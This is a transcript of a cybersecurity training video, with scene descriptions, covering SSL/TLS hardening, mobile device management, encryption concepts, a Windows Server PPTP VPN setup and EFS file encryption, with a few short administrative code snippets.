DWORD (32-bit) Value option and a new row appears. The values REG_DWORD
and 0x00000000 (0) appear under the Type and Data column headers. He enters
the value Enabled under the Name column header. [Video description ends]
So in other words, SSL 3.0 is not enabled. Now, you want to be careful when you
do this type of thing because depending on what other components need to talk to
the web server, like older versions of Microsoft SQL server, and older web
browsers, and what not, they might need to see SSL 3 on the server to function
properly. But at the same time, there are lot of known vulnerabilities. So ideally, it
shouldn't be used and you should upgrade the components that might require SSL
3.
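For reference, the same server-side registry change can be scripted. This is a minimal PowerShell sketch (run as Administrator on the web server, and try it in a lab first) mirroring the keys and values created above; a reboot is needed for Schannel changes to take effect, and a matching Client key can be added the same way if required.

    # Disable SSL 3.0 for the server side of Schannel, mirroring the GUI edits.
    $path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server'
    New-Item -Path $path -Force | Out-Null
    New-ItemProperty -Path $path -Name 'DisabledByDefault' -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path $path -Name 'Enabled'           -Value 0 -PropertyType DWord -Force | Out-Null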
Now, we could do the same thing for enabling TLS, Transport Layer Security,
which supersedes SSL by adding the appropriate keys and values here in the
registry, and then of course restarting the server. Then there is the web browser
side, so let's take a peek at that. I'm going to fire up Internet Explorer on this server.
And the first thing I'm going to do is enter http:// and then this hostname. And
notice we have access to it, but this is not an HTTPS or a secured connection, so it's
not even trying to use SSL or TLS.
[Video description begins] The host name is srv2016-1.fakedomain1.local/. [Video
description ends]
Now, I know that it's configured on my server, so I'm going to change the URL
prefix to https. Now we get a message about the page, page can't be displayed, and
then it tells me, we'll take a look at your settings here in the browser. Okay, I'll do
that. I'm going to go ahead and click the settings icon in the upper, right here in
Internet Explorer. I'm going to go down to Internet options. Then I'm going to go to
the Advanced tab and kind of scroll down under the Security section, and notice
that we don't have any check marks for SSL 3.
[Video description begins] The Internet Options dialog box opens. It contains seven
tabs: General, Security, Privacy, Content, Connections, Programs, and Advanced.
He clicks the Advanced tab. It includes a Settings section, which includes Use SSL
3.0, Use TLS 1.0, and Use TLS 1.1 checkboxes and Restore advanced settings
button. It also includes the Reset Internet Explorer settings section, which includes
a Reset button. [Video description ends]
Well, that is good. But we also don't have any for TLS. So for example, I should
really stay away from TLS 1.0 too. So I'll turn on the check marks to use TLS 1.1
and 1.2. Again, the only time you might turn on the other ones is if you absolutely
have no choice for backwards compatibility. But I do have a choice here, so I'm not
turning those on. I'm going to click OK and I'm going to refresh this page again.
[Video description begins] The Internet Options dialog box closes. [Video
description ends]
And notice now, it lets me in.
[Video description begins] The IIS Windows Server web page opens. [Video
description ends]
So there is a negotiation. There is a handshake when a web browser tries to make a
secured connection to some kind of a secured server, in this case, a web server over
HTTPS. And both of the ends of the connection, the server and the client, have to
agree ideally on the highest level of security that is supported. And that is where a
lot of vulnerabilities in the past have kicked in where attackers can force that
handshake to lower the security, to downgrade the security, for example, down to
SSL 3 during the negotiation. So they could take advantage of vulnerabilities. That
is not the case here the way we've configured it.
Mobile Device Access Control
[Video description begins] Topic title: Mobile Device Access Control. The
presenter is Dan Lachance. [Video description ends]
These days, mobile device usage is ubiquitous, it is everywhere. Whether you're
talking about a laptop, a tablet, and certainly that is the case with smartphones.
Now, the problem with mobile devices, yes, they do allow people to be productive,
even when they're out of the office. However, they can introduce organizational
security risks.
Especially in the case of BYOD, bring your own device, where users can use their
personal mobile device like a laptop or a smartphone, and they can use that with the
organization's systems. They can do work using their personal system. The problem
with this is that the IT department didn't have a chance to set this up from the
beginning and secure every aspect of it. And that personal device is also going to
be connected to home networks that might not be secured or public Wi-Fi hotspots
and so on. And so malware could be introduced to it which in turn could infect an
organization's production network when that mobile device connects. So, what do we
do about this?
We can use a mobile device management, or an MDM solution. This is a
centralized way for us to manage a multitude of mobile devices. Such as iOS
smartphones, or Android smartphones, or Windows phones, it doesn't matter. Now,
in the case of Microsoft, we can do this to a degree using System Center
Configuration Manager, SCCM. Now, this integrates with Microsoft Intune, which
is designed for mobile device management. So from a central management pane,
we can deploy policies that lock down mobile devices. And we can also control
which apps get installed on the devices and so on.
Another aspect of mobile device access control is captive portals. Now this isn't
really specific to mobile devices but it's a web page that a user needs to interact
with prior to getting on the Internet. And I'm sure you've seen this if you have
connected to a public Wi-Fi hotspot, such as in a coffee shop. You might have to
know a password before you're allowed out to the Internet and we're not talking
about the Wi-Fi network connection password. We're talking about after you're on
the Wi-Fi network and you fire up a web browser. You might have to specify
credentials or you might only have to agree to acceptable use settings on that
network and then proceed before you get a connection to the Internet.
That is a captive portal. So it may or may not require credentials. The other thing to
consider with mobile devices is PKI certificates. These are security certificates
that can be issued to users, devices, or software. So we might have devices like
smartphones authenticate to a VPN only if the smartphone has a unique identifier, a
PKI certificate that is trusted by the VPN configuration. That way, even if the user
is issued a different phone, if the device certificate doesn't go along with it or if a
new valid one isn't issued, the user will not be able to get on to the VPN. So it's an
additional layer of security. We should also consider network isolation for mobile
devices.
So for example, if we're going to allow bring your own device, BYOD, where
employees can use their own personal smartphones, let's say. We might want to
make sure when they're at work that they're on an isolated network as opposed to
being connected directly to a network with sensitive data. We can also enable MAC
address whitelisting prior to allowing access to the network. Whether it's done at
the wireless network level or whether it's done through a wired switch that supports
802.1X authentication. Now, this isn't specific to mobile devices. The same thing
could be done for servers and desktops and any type of device, including IoT
devices, they all have a MAC address.
This is a unique 48-bit hexadecimal hardware address. However, it can easily be
spoofed with freely available tools, just like IP addresses can be spoofed. However,
that doesn't mean they shouldn't be a part of our security strategy, one of the layers
where we have multiple layers to enhance security. Also, this might not be scalable
for anonymous guest networks because you're always going to have new devices
connecting, you don't already know their MAC addresses ahead of time. So an
example of where MAC address whitelisting would not be suitable would be at a
car dealership where we have a waiting room for customers as their cars are being
repaired or as the paperwork is being drawn up for their purchase of a new vehicle.
Well, we always have different customers in and we don't know what the MAC
addresses are ahead of time. So MAC address whitelisting doesn't make sense. But
what would make sense in that aspect for those mobile devices is to have a guest-isolated network that has no connectivity to the production network at that car
dealership. We can also configure mobile device settings using our centralized
mobile device management tool. And that way, we don't have to run around and
configure these security settings one by one in every device. So we can centrally control
things like turning off the microphone or the camera, or maybe disabling GPS location
services on the device, as well as enabling device encryption or remote wipe should the
device be lost or stolen and we want to remove any sensitive data from it. We can also schedule malware
engine and definition updates, and again, that is not really specific to mobile
devices. Same thing would be applicable to servers, to desktops, to laptops, to
really any operating system, whether it be physical or virtual. Any type of device
should always have malware definition protection on it. However, what is
important is that we bear in mind that for smartphones, a lot of people don't really
think of them as computers and as such there might not be an anti-virus solution
installed on them. It's absolutely crucial because there is plenty of malware for
smartphones. Remember, there are more smartphone users around the world than
any other type of device, so certainly the bad guys are focusing on that.
So we can schedule malware scans. We can also restrict the ability of users to
install mobile device apps. Or we might have a very limited list of mobile device
apps that users are allowed to install, trusted business apps. We can also centrally
configure password and authentication settings to make it harder for malicious
users to crack into a stolen smartphone, for example. We should also have a way to
gather centralized inventory in terms of hardware. So the types of devices we have
and their details along with the software installed in all the devices. This way, at
any point in time, we might be able to detect any anomalies in terms of software
that is installed on devices that isn't licensed or might present a security risk to the
organization.
Data Confidentiality
[Video description begins] Topic title: Data Confidentiality. The presenter is Dan
Lachance. [Video description ends]
Data confidentiality has always been a big deal, and certainly it's one of the focal
points of cybersecurity. However, these days, where we have so many devices
interconnected over the Internet, data confidentiality is even more relevant than it
ever has been. So data confidentiality really means that we're going to protect
sensitive data through encryption. The original source data is called plain text.
After the data is encrypted or scrambled, it's called cipher text. Let's take a look at
the encryption process. So we start with plain text. In this example, it simply says
The quick brown fox. Let's assume that that is sensitive information that we want to
protect. So what we would then do is take that plain text and feed it into an
encryption algorithm with a key, which results in cipher text. In other words, the
encrypted data or the scrambled data.
Now, an encryption algorithm is really a mathematical function, and we'll talk
about keys. Keys can either be unique or not. And the key is part of what is used as
the mathematical code that is fed into the algorithm to result in that unique cipher
text. Of course, decryption happens in the opposite direction given that we have the
correct decryption key. Symmetric encryption is a type of encryption where only
one unique key is used. It gets called a secret key because there is only one, and it
can encrypt and it can also decrypt. So this secret key then has a couple of
problems, one of which is how can we securely distribute this secret key over a
network? Especially on large scale such as over the Internet. That is a problem.
Secondly, if the key is compromised, then all encrypted data encrypted by that key,
is then also compromised, it can be decrypted.
Talk about having all of your eggs in one basket. So symmetric encryption does
have its place when it's used in conjunction with asymmetric encryption.
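As a small illustration of symmetric encryption, here is a minimal PowerShell/.NET sketch, not a production key-management approach: a single AES key (and IV) both encrypts and decrypts the same plain text, which is exactly why protecting that one secret key matters so much.

    # Symmetric (secret key) encryption: the same key encrypts and decrypts.
    $aes    = [System.Security.Cryptography.Aes]::Create()    # random key + IV
    $plain  = [System.Text.Encoding]::UTF8.GetBytes('The quick brown fox')
    $cipher = $aes.CreateEncryptor().TransformFinalBlock($plain, 0, $plain.Length)

    # Anyone holding the same key (and IV) can decrypt the cipher text:
    $decrypted = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    [System.Text.Encoding]::UTF8.GetString($decrypted)        # The quick brown fox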
Asymmetric encryption, as the name implies, uses two different yet
mathematically related keys: a public key and a private key. And when
we talk about asymmetric encryption, you'll also often hear it referred to as public
key encryption. Now, securely distributing the public key isn't a problem, that is
why it's called a public key. You can give it to anybody and there is no security
risk. But of course, the private key is private to the user device or software to which
it was issued, and it must be kept safe.
Often public and private keys are the result of issuing a PKI security certificate to
an entity. So the thing to bear in mind is that when we need to encrypt something
using asymmetric encryption, the target's public key is what is used to encrypt a
message. So if I'm sending an encrypted email message to you, I would need your
public key to encrypt the message for you. Now, the target's private key is what is
used to decrypt the message. So in our example to continue it, you would use your
mathematically related private key to decrypt the message that was encrypted with
your related public key.
[Video description begins] Encryption Technologies. [Video description ends]
Now, encryption can be applied to data at rest, data that is being stored on storage
media. Examples include things like Microsoft BitLocker which is built into some
Windows editions such as Windows 10 Enterprise. And it allows the encryption of
entire disk volumes. We've also got Microsoft Encrypting File System, EFS, which is different from BitLocker because you can cherry-pick the files and folders that you want to encrypt. And it's tied to the user account, whereas BitLocker is tied to the machine. Depending on the cloud provider we might be using, like Microsoft Azure or Amazon Web Services or Google Cloud and so on, we also have options for server-side encryption when we store our data in the cloud.
But we can also encrypt data as it's being transmitted over the network, and there
are many ways to do this, such as using a VPN, a virtual private network. This
allows a user that is working remotely to have an encrypted connection over the
Internet to a private network elsewhere, such as at work. Encrypting data using
Hypertext Transfer Protocol Secure, HTTPS, is everywhere, it's used all the time.
And in order for this to work, the web server needs to have been issued a PKI
security certificate. I'm not going to call it an SSL or TLS certificate, because SSL
and TLS are really methods of exchanging keys over a network. They're really not
tied to the certificate itself.
So I can use a PKI certificate on a web server that is configured for SSL, which
shouldn't be done because SSL is not secure and is deprecated. I could use the exact
same certificate, though, just as an example, on a different web server configured
for TLS. Now, as long as the server has the correct name or IP address that is in the
certificate, it would work fine. So the certificate is not tied to SSL or TLS. These
are protocol settings that are configured on the server as well as on the web browser
side of the connection.
Now, we can also secure data in transit when we are remotely administering
network devices like routers or switches or printers or Unix or Linux hosts, or even
Windows machines, if we install an SSH daemon on them. We can use Secure Shell, SSH, to do that. Secure Shell is an encrypted connection over a network that is designed to do what we just described: perform remote administration at the command line level.
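If you wanted to script that kind of remote administration instead of typing commands interactively, something like the third-party paramiko package can drive SSH from Python; this is only a sketch, and the host name and credentials are placeholders:

import paramiko  # third-party SSH library, an assumption rather than part of the demo

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # lab convenience only
client.connect("192.168.0.50", username="admin", password="P@ssw0rd")

# Run one administrative command over the encrypted channel.
_stdin, stdout, _stderr = client.exec_command("uptime")
print(stdout.read().decode())
client.close()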
Implement Encryption for Data in Motion
[Video description begins] Topic title: Implement Encryption for Data in Motion.
The presenter is Dan Lachance. [Video description ends]
We've talked about protecting data at rest and also protecting data in motion. Now
it's time to see how to actually do that. Specifically, protecting data in motion.
We're going to set up a very simple VPN environment here on Microsoft Windows Server 2016, which will allow users working remotely to establish an encrypted VPN tunnel over the Internet, so that everything they send over the Internet to the private network here at work is encrypted and protected. To get started here in Server 2016, I'm going to go to my Start menu, and I'm going to fire up the Server Manager, because I need to make sure the appropriate component or role services are installed before I go and configure a VPN. So I'm going to click Add roles and features,
[Video description begins] The Server Manager - Dashboard window is open. It is
divided into three parts. The first part includes four menus: Manage, Tools, View,
and Help. The second part includes Dashboard, Local Server, All Servers, and IIS
options. The Dashboard option is selected. The third part includes different
sections. The WELCOME TO SERVER MANAGER section includes a box. The box
is divided into two parts. The first part contains three options: QUICK START,
WHAT'S NEW, and LEARN MORE. The QUICK START option is selected and its
contents are displayed in the second part. It contains Configure this local server,
Add roles and features, Add other servers to manage, Create a server group, and
Connect this server to cloud services links. The ROLES AND SERVER GROUPS
section includes AD DS, DNS, and File and Storage Services tiles. [Video
description ends]
and I'll click Next on the first couple of screens,
[Video description begins] The Add Roles and Features Wizard opens. It is divided
into two parts. The first part contains Before You Begin, Installation Type, Server
Selection, Server Roles, Features, Confirmation, and Results options. The second
part displays the contents corresponding to the option in the first part. The wizard
also includes four buttons: Previous, Next, Install, and Cancel. The Before You
Begin option is selected. [Video description ends]
since I know I want to install something on the local server from where I'm running
this.
[Video description begins] He clicks the Next button and the Installation Type page
opens. He clicks the Next button and the Server Selection page opens. He clicks the Next button and the Server Roles page opens. The page includes Roles and
Description of the selected role. Roles includes Active Directory Certificate
Services, DHCP Server, File and Storage Services (3 of 12 installed), and Remote
Access checkboxes. [Video description ends]
And I'm interested here in the Remote Access side of things on the server, the
Remote Access role. I'm going to go ahead and turn that on.
[Video description begins] He selects the Remote Access checkbox and the
corresponding description displays. [Video description ends]
After a moment, it'll turn on the check mark. Over on the right I can see it's
describing that it allows things like DirectAccess, VPN, Web Application Proxy.
[Video description begins] He points to the description of the Remote Access
checkbox. [Video description ends]
So we want the VPN aspect, so I'm going to go ahead and click Next. I don't need any additional features, so I'll just proceed beyond this.
[Video description begins] The Select features page opens. It includes Features and
the Description of the selected feature. Features includes .NET Framework 3.5
Features (1 of 3 installed), .NET Framework 4.6 Features (4 of 7 installed),
BitLocker Drive Encryption, and Group Policy Management (Installed)
checkboxes. [Video description ends]
And as I'm proceeding here, I'm just going to click
[Video description begins] He clicks the Next button and the Remote Access page
opens. He clicks the Next button and the Select role services page opens. It includes
Role services and the Description of selected role service. Role services contains
three checkboxes: DirectAccess and VPN (RAS), Routing, and Web Application
Proxy. [Video description ends]
DirectAccess and VPN (RAS) because that is what I want. I'm going to add the
features for management tools
[Video description begins] The Add Roles and Features Wizard opens. It includes
Include management tools (if applicable) checkbox and Add Features and Cancel
buttons. [Video description ends]
and I will proceed again by clicking, Next and then finally, Install.
[Video description begins] He clicks the Add Features button and the Add Roles
and Features Wizard closes. [Video description ends]
And now it's the waiting game.
[Video description begins] He clicks the Next button and the Confirm installation
selections page opens. He clicks the Install button and the Installation progress
page opens. [Video description ends]
We wait for this to be installed before we can begin configuring our server side
VPN. Okay, before too long the installation will be completed. So I'm going to go
ahead and click Close.
[Video description begins] The Add Roles and Features Wizard closes. [Video
description ends]
Then here in the Server Manager tool, I'll go to the Tools menu so we can start
configuring this. I'm interested in the Remote Access Management tool. Now in
here, I can configure a VPN among other things like direct access or the web
application proxy, and so on.
[Video description begins] The Remote Access Management Console window
opens. It is divided into three parts. The first part is the navigation pane, which
includes the Configuration and Srv2016-1 options. The Configuration option
includes DirectAccess and VPN sub option. The second part is the content pane.
The third part is the Tasks pane, which includes the General option. It further
includes Manage a Remote Server and Refresh Installed Roles sub options. [Video
description ends]
I can also configure my VPN in the Routing and Remote Access tool as well. So if I were to, let's say, minimize this and go back into Tools, I also have a Routing and Remote Access tool. Now this is an older tool that you might already be familiar with if you've got experience with previous versions of the Windows Server operating system. I'm going to go ahead and use this one.
[Video description begins] The Routing and Remote Access window opens. It is
divided into four parts. The first part is the menu bar. The second part is the
Toolbar. The third part contains the Routing and Remote Access root node, which
contains the Server Status and SRV2016-1 (local) options. The SRV2016-1 (local)
option is selected. The Welcome to Routing and Remote Access page is open in the
fourth part. [Video description ends]
So over on the left I can see my server name with a little red down-pointing arrow because Routing and Remote Access has not yet been configured. And we are going to configure a VPN here, so I'm going to right-click and choose Configure and Enable Routing and Remote Access.
[Video description begins] The Routing and Remote Access Server Setup Wizard
opens. [Video description ends]
And I'll click Next in the wizard.
[Video description begins] The Configuration page opens. It contains five radio
buttons: Remote access (dial-up or VPN), Network address translation (NAT),
Virtual private network (VPN) access and NAT, Secure connection between two
private networks, and Custom configuration. [Video description ends]
Now, normally, you would have at least two network cards in your VPN host,
whether it's physical or virtual. One network card connected to a public-facing
network that is reachable from the Internet, that users would connect to to establish
the VPN tunnel. And the second card, and maybe more than just two cards, would
connect to internal networks to allow that connectivity. So here I've only got one
network card, so to proceed with this example, to configure the VPN, I'm going to
have to choose Custom configuration here in the wizard, instead of Remote access
(dial-up or VPN). So having done that, I'll click Next. I'm going to turn on VPN
access.
[Video description begins] The Custom Configuration page opens. It contains five
checkboxes: VPN access, Dial-up access, Demand-dial connections (used for
branch office routing), NAT, and LAN routing. [Video description ends]
I'll click Next, and Finish.
[Video description begins] The Completing the Routing and Remote Access Server
Setup Wizard page opens. [Video description ends]
Now what I've done at this point is configured a PPTP, or a Point to Point
Tunneling Protocol VPN.
[Video description begins] He clicks the finish button and the Routing and Remote
Access dialog box opens. It contains Start service and Cancel buttons. [Video
description ends]
There are many other types of VPNs, like SSL VPNs, which require a PKI
certificate. We could also have configured a layer two tunneling protocol VPN, and
so on. So here I am just going to click Start service to get this up and running.
[Video description begins] The Routing and Remote Access dialog box
closes. [Video description ends]
The only other thing I really should do is determine which IP addresses I want to
hand out to VPN clients.
[Video description begins] The Routing and Remote Access Server Setup Wizard
closes. [Video description ends]
So for that I am going to right-click on my server in the left-hand navigator and I
am going to go into Properties, IPv4.
[Video description begins] The SRV2016-1 (local) Properties dialog box opens. It
contains seven tabs: General, Security, IPv4, IPv6, IKEv2, PPP, and Logging. He
selects the IPv4 tab. It includes Enable IPv4 Forwarding checkbox, which is
selected. It also includes the IPv4 address assignment section, which further
includes Dynamic Host Configuration Protocol (DHCP) and Static address pool
radio buttons. This section also includes a table with five column headers: From,
To, Number, IP Addresses, and Mask and Add, Edit, and Remove buttons. The IPv4
tab also includes Enable broadcast name resolution checkbox and Adapter drop-down list box. The Allow RAS to select adapter option is selected in the Adapter drop-down list box. [Video description ends]
And what I want to do is use a Static address pool for VPN clients, I'll click Add.
Let's say, I want to give them an address starting at 1.1.1.1
[Video description begins] He selects the Static address pool radio button and
clicks the Add button. The New IPv4 Address Range dialog box opens. It contains
Start IP address, End IP address, and Number of addresses fields and OK and
Cancel buttons. [Video description ends]
through to 1.1.1.50. That way I have a unique range that identifies VPN clients if I
happen to be taking a look on the network and seeing which devices are on the
network.
[Video description begins] He enters the values 1.1.1.1 and 1.1.1.50 in the Start IP
address and End IP address fields, respectively. The Number of addresses field
displays the value 50. [Video description ends]
I know these are VPN devices. So I'll click OK and OK.
[Video description begins] The New IPv4 Address Range dialog box closes. [Video
description ends]
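As a side note, if you ever want a script to check whether an address seen on the network came out of that static pool, a few lines of Python with the standard ipaddress module will do it; the pool boundaries match the values entered above:

import ipaddress

pool_start = int(ipaddress.IPv4Address("1.1.1.1"))
pool_end = int(ipaddress.IPv4Address("1.1.1.50"))

def looks_like_vpn_client(address):
    # True when the address falls inside the 50-address VPN pool.
    return pool_start <= int(ipaddress.IPv4Address(address)) <= pool_end

print(looks_like_vpn_client("1.1.1.2"))       # True
print(looks_like_vpn_client("192.168.0.10"))  # False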
The other thing to watch out for is to make sure that users that will
be authenticating to the VPN are allowed to do that.
[Video description begins] The SRV2016-1 (local) Properties dialog box
closes. [Video description ends]
So here in the Windows world I'm going to go back to my Start menu. I've got
Microsoft Active Directory configured, so I'm going to go ahead and start the
Active Directory Users and Computers tool. Because in here is one way that I can
enable remote access to make sure that users are allowed to establish a VPN
connection. So here I've got a user called User One.
[Video description begins] The Active Directory Users and Computers window
opens. It is divided into four parts. The first part is the menu bar. The second part
is the Toolbar. The third part contains the Active Directory Users and Computers
root node. It contains two nodes, Saved Queries and fakedomain1.local. The
fakedomain1.local is expanded and it includes Admins, Computers, and LasVegas
subnodes. The LasVegas subnode further contains Computers and Groups
subnodes and Users folder. A table with Name, Type, and Description column
headers and one row is displayed in the fourth part. The values User One and User
are displayed under the Name and Type column headers. [Video description ends]
So I'm just going to right-click and go over to the Properties for that account. And
what I'm really interested in here is the Dial-in tab.
[Video description begins] The User One Properties dialog box opens. It includes
General, Address, Account, and Profile tabs. The General tab is selected. It
includes First name, Initials, Last name, and Display name text boxes. [Video
description ends]
I want to make sure that Network Access Permission is allowed.
[Video description begins] He clicks the Dial-in tab. The Dial-in tab is divided into
four sections: Network Access Permission, Callback Options, Assign Static IP
Addresses, and Apply Static Routes. The Network Access Permission section
includes Allow access, Deny access, and Control access through NPS Network
Policy radio buttons. The Callback Options include No Callback, Set by Caller
(Routing and Remote Access Service only), and Always Callback to radio buttons
and a text box adjacent to the Always Callback to radio button. [Video description
ends]
Notice here that it could be denied, and we could also control it through a network policy instead of having to do it within each individual user account. But at this level, notice that access is in fact allowed. I'm going to go ahead and click OK.
[Video description begins] The User One Properties dialog box closes. [Video
description ends]
Next, I'll configure the client's side of the VPN connection here on Windows 10.
Where the first thing I'll do is go to my Start menu and search up Settings. Now I'm
going to go on the Settings on my machine, then I'll go into Network & Internet.
[Video description begins] The Windows Settings window opens. It includes
Network & Internet, System, Devices, and Accounts options. [Video description
ends]
And I'm very interested in creating a new connection, so I'll start by clicking
Change adapter options.
[Video description begins] The Network & Internet page opens. It is divided into
two parts. The first part includes Home, Status, Wi-Fi, Ethernet, and VPN options
and a Find a settings search box. The second part displays the contents of the
corresponding option in the first part. The Status option is selected and its content
is displayed in the second part. It includes different sections. The Change your
network settings section contains three options: Change adapter options, Sharing
options, and Network troubleshooter. It also includes Network and Sharing Center
and Windows Firewall links. [Video description ends]
Here we can see any network adapters that are configured on this machine.
[Video description begins] The Network Connections window opens. It includes
Bluetooth Network Connection, Ethernet, Ethernet 2, and Wi-Fi options. [Video
description ends]
Well when you configure a VPN, you're going to end up configuring a new
adapter that shows up here, a logical adapter. So the next thing I'll do here on
Windows 10 is add a new network connection.
[Video description begins] He closes the Network Connections window. [Video
description ends]
So to do that I'm going to go to the Network and Sharing Center, and I'm going to
choose Set up a new connection or network.
[Video description begins] The Network and Sharing Center window opens. It is
divided into two parts. The first part includes Control Panel Home, Change
adapter settings, Media streaming options, Infrared, and Internet Options links.
The second part is divided into two sections. The first section is the View your
active networks and the second section is the Change your networking settings. The
Change your networking settings contains Set up a new connection or network and
Troubleshoot problems links. [Video description ends]
And this is going to be Connect to a workplace, click Next.
[Video description begins] The Set Up a Connection or Network window opens. It
includes four options: Connect to the Internet, Set up a new network, Manually
connect to a wireless network, and Connect to a workplace. It also includes Next
and Cancel buttons. [Video description ends]
I'm going to use my Internet connection; you need to be on the Internet to establish
a VPN link to the public interface of the VPN host.
[Video description begins] The Connect to a Workplace wizard opens. It includes
two options: Use my Internet connection (VPN) and Dial directly. It also includes
Cancel button. [Video description ends]
So now I have to specify the address or name that resolves to an IP address of that
host.
[Video description begins] He selects the Use my Internet connection (VPN)
option. The Type the Internet address to connect to page opens. It includes Internet
address and Destination name text boxes and Use a smart card, Remember my
credentials, and Allow other people to use this connection checkboxes. The
Destination name text box displays the value VPN Connection. The Remember my
credentials checkbox is selected. It also includes Create and Cancel
buttons. [Video description ends]
So I've popped in the IP address of that VPN server. I'm going to leave the
Destination name here just called VPN Connection.
[Video description begins] He enters the value 192.168.0.231 in the Internet
address text box. [Video description ends]
I'm not using a smart card for authentication although that is a great way to further
secure your environment.
[Video description begins] He unchecks the Remember my credentials
checkbox. [Video description ends]
And I certainly don't want to remember my credentials and I'll just click Create.
[Video description begins] The Type the Internet address to connect to page
closes. [Video description ends]
So if we were to go back and look at our adapters, we're going to see that we've
now got that virtual adapter I was talking about.
[Video description begins] He clicks the Change adapter settings link and the
Network Connections window opens again. [Video description ends]
It's called VPN Connection, because that is what we named it. And we're currently
disconnected, so we're going to go ahead and right-click and go into the Properties.
[Video description begins] He points to the VPN Connection option. [Video
description ends]
Because one of the things I want to do under Security is specify that we're using a
Point to Point Tunneling Protocol (PPTP), VPN. And then I'm going to right-click
and choose connect on that adapter.
[Video description begins] The VPN Connection Properties dialog box opens. It
contains five tabs: General, Options, Security, Networking, and Sharing. He clicks
the Security tab and it includes Type of VPN and Data encryption drop-down list
boxes. He clicks the Type of VPN drop-down list and selects the Point to Point
Tunneling Protocol (PPTP) option. He clicks the OK button and the VPN
Connection Properties dialog box closes. [Video description ends]
And I'm going to select the VPN Connection and choose Connect.
[Video description begins] He right-clicks the VPN Connection option in the
Network Connections window and a panel appears, which includes Npcap
Loopback Adapter, VPN Connection, and ARRIS-17BB-Basement options. [Video
description ends]
So at this point it's asking me for credentials, so I'm going to go ahead and specify
let's say user one's name and password.
[Video description begins] The Sign in dialog box opens. It contains User name
and Password text boxes and OK and Cancel buttons. [Video description ends]
And once I've done that we can see that we now have a valid connection.
[Video description begins] He enters the value Uone in the User name text
box. [Video description ends]
Well, if I just take a look here at the status when I right-click on it, we could see
that we've got some information being transmitted through this VPN connection.
[Video description begins] He points to the VPN Connection option. [Video
description ends]
And from a Command Prompt, if I were to type ipconfig, we would see that we've
got our VPN connection listed here.
[Video description begins] He right-clicks the VPN Connection option and clicks
the Status option. The VPN Connection Status dialog box opens. It contains two
tabs, General and Details. The General tab is selected. It is divided into two
sections, Connection and Activity, which display information about the VPN
connection. [Video description ends]
Scroll up a little bit.
[Video description begins] He opens the Command Prompt window. It displays the
C:\Users\danla> prompt. [Video description ends]
Right here, VPN connection listed as another adapter with an IP address within the
space that we configured.
[Video description begins] He points to the PPP adapter VPN Connection and
1.1.1.2 IPv4 address in the command prompt window. [Video description ends]
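For what it's worth, the client side of this connection can also be scripted. Here is a minimal sketch that assumes the VPN Connection phonebook entry created above, Windows' built-in rasdial utility, and placeholder credentials:

import subprocess

# Dial the PPTP entry created in the GUI; the user name and password are placeholders.
subprocess.run(["rasdial", "VPN Connection", "Uone", "P@ssw0rd"], check=True)

# Confirm the logical PPP adapter picked up an address from the 1.1.1.x pool.
output = subprocess.run(["ipconfig"], capture_output=True, text=True).stdout
print("PPP adapter" in output and "1.1.1." in output)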
Implement Encryption for Data at Rest
[Video description begins] Topic title: Implement Encryption for Data at Rest. The
presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll implement encryption for data at rest. And I'll be using
Microsoft Encrypting File System, or EFS, to do it. EFS is a part of the Windows
operating system, but you won't find it in some editions of Windows client
operating systems, like Windows 10 Home. However, here on my Windows server,
I've got some sample files, and I want to encrypt one of them.
[Video description begins] The File Explorer window is open. It is divided into two
parts. The first part is the navigation pane and it includes Downloads and
Documents options and Logs and 2017_Patients folders. The second part contains
four files: PHI_Automation_Test.txt, PHI-YHZ-004-0456-007.xls, PHI-YHZ-004-0456-008.xls, and PHI-YHZ-004-0456-009.xls. [Video description ends]
What I'm going to do is right-click on the file I want to encrypt and choose
Properties.
[Video description begins] He right-clicks the PHI-YHZ-004-0456-009.xls file, a
shortcut menu appears and he selects the Properties option. The PHI-YHZ-004-0456-009.xls Properties dialog box opens. It contains five tabs: General,
Classification, Security, Details, and Previous Versions. The General tab is
selected and it displays information about the PHI-YHZ-004-0456-009.xls file,
which includes Type of file, Location, Size on disk, and Created. It also includes
two Attributes checkboxes, Read-only and Hidden. It also includes Advanced, OK,
Cancel, and Apply buttons. [Video description ends]
From here, I can go to the Advanced button, and in the Advanced Attributes down
at the bottom, I can choose to either compress or encrypt the file, not both.
[Video description begins] The Advanced Attributes dialog box opens. It is divided
in two sections, File attributes and Compress or Encrypt attributes and it includes
OK and Cancel buttons. The File attributes section contains two checkboxes, File
is ready for archiving and Allow this file to have contents indexed in addition to file
properties. Both the checkboxes are checked. The Compress or Encrypt attributes
section contains two checkboxes, Compress contents to save disk space and
Encrypt contents to secure data and Details button. [Video description ends]
I'm going to choose Encrypt contents to secure data, and I'll click OK twice.
[Video description begins] He clicks OK and the Advanced Attributes dialog box
closes. He again clicks OK and the PHI-YHZ-004-0456-009.xls Properties dialog
box closes. [Video description ends]
After a moment, we should be able to see that we've got a tiny golden padlock icon
on that file icon, which implies that the file is in fact encrypted. Now it's encrypted
and tied to the user that's currently logged in.
[Video description begins] He points to the PHI-YHZ-004-0456-009.xls file. [Video
description ends]
So I'm going to fire up the Start menu here on my machine, and I'm going to type
certmgr.msc. That will start the certificate manager Microsoft console built in to
Windows. Now when I do that, I can examine my certificates.
[Video description begins] The certmgr – [Certificates – Current User] window
opens. It is divided into three parts. The first part is the Toolbar. The second part
contains the Certificates – Current User root node, which includes Personal,
Enterprise Trust, Trusted People, and Other People nodes. The third part displays
the contents of the option selected in the second part. [Video description ends]
Now what does that have to do with EFS? Well, if you didn't already have a
certificate prior to encrypting your first file with EFS, the operating system will
make one for you. So it will be here under Personal>Certificates.
[Video description begins] He clicks the Certificates folder under the Personal
node and a table is displayed in the third part. The table includes Issued To, Issued
By, Expiration Date, Intended Purposes, and Friendly Name column headers and
two rows. The values Administrator, Administrator, 10/15/2116, File Recovery, and
<None> are displayed in the first row and values Administrator, Administrator,
11/12/2118, Encrypting File System, and <None> are displayed in the second row
under the Issued To, Issued By, Expiration Date, Intended Purposes, and Friendly
Name column headers, respectively. [Video description ends]
Now this is for the current user, as we can see. And notice that I've got an
encrypting file system, or EFS certificate here, issued to user Administrator, which
is who I'm currently logged in as. I can just pop that up by double-clicking if I want
to see any further details on any of these. What I'm interested in looking at here, is
looking at the validity date.
